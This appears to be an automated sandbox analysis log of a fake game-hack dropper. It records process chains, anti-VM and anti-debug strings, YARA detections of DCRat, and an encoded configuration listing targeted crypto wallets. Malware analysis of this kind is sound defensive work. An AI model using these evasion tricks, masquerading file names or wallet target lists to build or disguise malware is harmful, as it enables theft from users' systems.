                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\Documents\desktop.ini
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\AppData
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\Desktop\desktop.ini
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: goware/pkg/detection/Anti_VM.VMWareBIOS
                      Source: containerRuntime.exe, 0000001A.00000002.1902578971.000000001B725000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: C:/Users/h3xcode/GolandProjects/AntiVM/pkg/detection/Anti_VM/VMWare.go
                      Source: containerRuntime.exe, 0000001A.00000002.1902638465.000000001B72B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                      Source: Solara.exeBinary or memory string: teDivideScrollLShiftRShiftOEM102PacketNoNamebitmaphackerinjectdumperdeobfsvmware%*s%s activeclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks Lockedexec: 390625rdtscppopcntuint16uint32uint64structchan<-<-chan Value
                      Source: GameHack.exe, 00000008.00000003.1295968770.0000000000C73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yw{
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: goware/pkg/detection/Anti_VM.VMWareDisk
                      Source: containerRuntime.exe, 0000001A.00000002.1902578971.000000001B725000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalntohsCall Counttls: Earlyparsefilesimap2imap3imapspop3shostsutf-8%s*%dtext/bad nGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSHA-1matchrune cpu%dP-224P-256P-384P-521ECDSA (at ClassStringFormat[]byte' for stringCancelReturnEscapeAcceptSelectInsertDeleteDivideScrollLShiftRShiftOEM102PacketNoNamebitmaphackerinjectdumperdeobfsvmware%*s%s
                      Source: wscript.exe, 00000006.00000002.1351138385.00000000009D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\.
                      Source: containerRuntime.exe, 0000001A.00000002.1902988796.000000001BA37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
                      Source: containerRuntime.exe, 0000001A.00000002.1920943290.000000001BB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:&
                      Source: RegAsm.exe, 00000012.00000002.2537701192.0000000005AC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                      Source: GameHack.exe, 00000008.00000002.1297051260.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22,
                      Source: Solara.exe, 00000009.00000002.2509569119.0000000000112000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2537701192.0000000005AC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-24556
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeAPI call chain: ExitProcess graph end nodegraph_8-24466
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A2866F
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2753D mov eax, dword ptr fs:[00000030h]0_2_00A2753D
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF753D mov eax, dword ptr fs:[00000030h]8_2_00EF753D
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2B710 GetProcessHeap,0_2_00A2B710
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1F063 SetUnhandledExceptionFilter,0_2_00A1F063
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A1F22B
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A2866F
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A1EF05
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEF063 SetUnhandledExceptionFilter,8_2_00EEF063
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00EEF22B
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EF866F
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EEEF05
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" Jump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get model,serialnumberJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ProgMan
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: %sinvalid styleSetWindowLongShell_TrayWndDestroyWindowGetWindowLongGetWindowRectGetClientRectSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAuthorizationCache-ControlLast-ModifiedAccept-RangesIf-None-Match[FrameHeader invalid base accept-rangesauthorizationcache-controlcontent-rangeif-none-matchlast-modifiedFQDN too longsocks connectReset ContentLoop Detectedfield name %qFindFirstFile3814697265625RegOpenKeyExWRegEnumValueWImageList_AddCreateRectRgnGetDeviceCapsSetBrushOrgExValueOverflowCreateActCtxWFindResourceWRtlMoveMemoryCoTaskMemFreeOleInitializeSysFreeStringwglShareListsPdhCloseQueryShellExecuteWAnimateWindowDrawFocusRectGetClassNameWGetMenuItemIDGetScrollInfoGetSystemMenuSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWwakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitout of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}
                      Source: Solara.exeBinary or memory string: Stack: %sinvalid styleSetWindowLongShell_TrayWndDestroyWindowGetWindowLongGetWindowRectGetClientRectSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAuthorizationCache-ControlLast-ModifiedAccept-RangesIf-None-Match[FrameHeader invalid base accept-rangesauthorizationca
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1ED5B cpuid 0_2_00A1ED5B
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A1A63C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: GetLocaleInfoW,GetNumberFormatW,8_2_00EEA63C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeQueries volume information: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeQueries volume information: C:\Windows\Web\Wallpaper\Windows\img0.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeQueries volume information: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeQueries volume information: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A1D5D4
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0ACF5 GetVersionExW,0_2_00A0ACF5
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected DCRat
                      Source: Yara matchFile source: 23.2.runtimesvc.exe.1ba70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.runtimesvc.exe.1ba70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.1846009611.00000000125BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: runtimesvc.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: containerRuntime.exe PID: 7620, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: containerRuntime.exe, 0000001A.00000002.1720636580.0000000002692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"6c695916fbddfd6c86d9c925ce0f3d9296d13743":{"antilowmemory":"==QZ1JHV","recheck":"=U2csFmR","antivm":"==QZ1JHV","antiwindowsserver":"==QZ1JHV","antisandbox":"==QZ1JHV","antidebuggers":"==QZ1JHV","antiprocessmonitors":"==QZ1JHV","antihttpdebuggers":"==QZ1JHV","antianyrunvt":"==QZ1JHV","ramlim":"==AOyADN"},"2d421f511019ab10b4005cadf6e8fab088ff728d":{"zcash":"==QZ1JHV","exodus":"==QZ1JHV","electrum":"==QZ1JHV","monero":"==QZ1JHV","ethereum":"==QZ1JHV","bytecoin":"==QZ1JHV","litecoincore":"==QZ1JHV","dashcore":"==QZ1JHV","bitcoincore":"==QZ1JHV","atomic":"==QZ1JHV","armory":"==QZ1JHV","binance":"==QZ1JHV","metamask":"==QZ1JHV","tronlink":"==QZ1JHV","ronin":"==QZ1JHV","binanceweb":"==QZ1JHV","phantom":"==QZ1JHV","ton":"==QZ1JHV","yoroi":"==QZ1JHV","extscanscheme":"yV2cVBCduVmcyV3Q"},"3229e69b07edc9bd628bb55e1896cde346364250":{"workscheme":"zRGbpVnQ"},"b4de96d4f5b80f0481953e762e42bc2a3abd9dba":{"processes":"5RXayV3YlNnbvRncv5mCkNXZtMnbK8VYylmdhpwc0BjNzogclRmblZWZkRXaipQZlZWYj1mCzVncpZXa05WYK8FdzFmdhpQMyMHdrpAc1RXZzJWb","windows":"lVmZhNWbKwWY09GdgAjNzowc39GZul2dgoL04CdvQLY04CdiRDL03CtCyVGZuVmZlRGIzd3bk5Wa3pAIyVGZuVmZlRGdpJmCkJXY1dGbsVnYKMXZ0lnYlJXY3xWYtpQespnepJ3ZKkHdpJXdjV2cg42b0J3bupQgRPY0AGNuQLL04CtgR3L0wCtCzVncpZXa05WYKIWZ3JHZKk3azJXZwNXYrpAdzFmdhpAdlNXZ"}}
                      Source: runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
                      Source: runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
                      Source: containerRuntime.exe, 0000001A.00000002.1720636580.0000000002692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"6c695916fbddfd6c86d9c925ce0f3d9296d13743":{"antilowmemory":"==QZ1JHV","recheck":"=U2csFmR","antivm":"==QZ1JHV","antiwindowsserver":"==QZ1JHV","antisandbox":"==QZ1JHV","antidebuggers":"==QZ1JHV","antiprocessmonitors":"==QZ1JHV","antihttpdebuggers":"==QZ1JHV","antianyrunvt":"==QZ1JHV","ramlim":"==AOyADN"},"2d421f511019ab10b4005cadf6e8fab088ff728d":{"zcash":"==QZ1JHV","exodus":"==QZ1JHV","electrum":"==QZ1JHV","monero":"==QZ1JHV","ethereum":"==QZ1JHV","bytecoin":"==QZ1JHV","litecoincore":"==QZ1JHV","dashcore":"==QZ1JHV","bitcoincore":"==QZ1JHV","atomic":"==QZ1JHV","armory":"==QZ1JHV","binance":"==QZ1JHV","metamask":"==QZ1JHV","tronlink":"==QZ1JHV","ronin":"==QZ1JHV","binanceweb":"==QZ1JHV","phantom":"==QZ1JHV","ton":"==QZ1JHV","yoroi":"==QZ1JHV","extscanscheme":"yV2cVBCduVmcyV3Q"},"3229e69b07edc9bd628bb55e1896cde346364250":{"workscheme":"zRGbpVnQ"},"b4de96d4f5b80f0481953e762e42bc2a3abd9dba":{"processes":"5RXayV3YlNnbvRncv5mCkNXZtMnbK8VYylmdhpwc0BjNzogclRmblZWZkRXaipQZlZWYj1mCzVncpZXa05WYK8FdzFmdhpQMyMHdrpAc1RXZzJWb","windows":"lVmZhNWbKwWY09GdgAjNzowc39GZul2dgoL04CdvQLY04CdiRDL03CtCyVGZuVmZlRGIzd3bk5Wa3pAIyVGZuVmZlRGdpJmCkJXY1dGbsVnYKMXZ0lnYlJXY3xWYtpQespnepJ3ZKkHdpJXdjV2cg42b0J3bupQgRPY0AGNuQLL04CtgR3L0wCtCzVncpZXa05WYKIWZ3JHZKk3azJXZwNXYrpAdzFmdhpAdlNXZ"}}
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore

                      Remote Access Functionality

                      barindex
                      Yara detected DCRat
                      Source: Yara matchFile source: 23.2.runtimesvc.exe.1ba70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.runtimesvc.exe.1ba70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
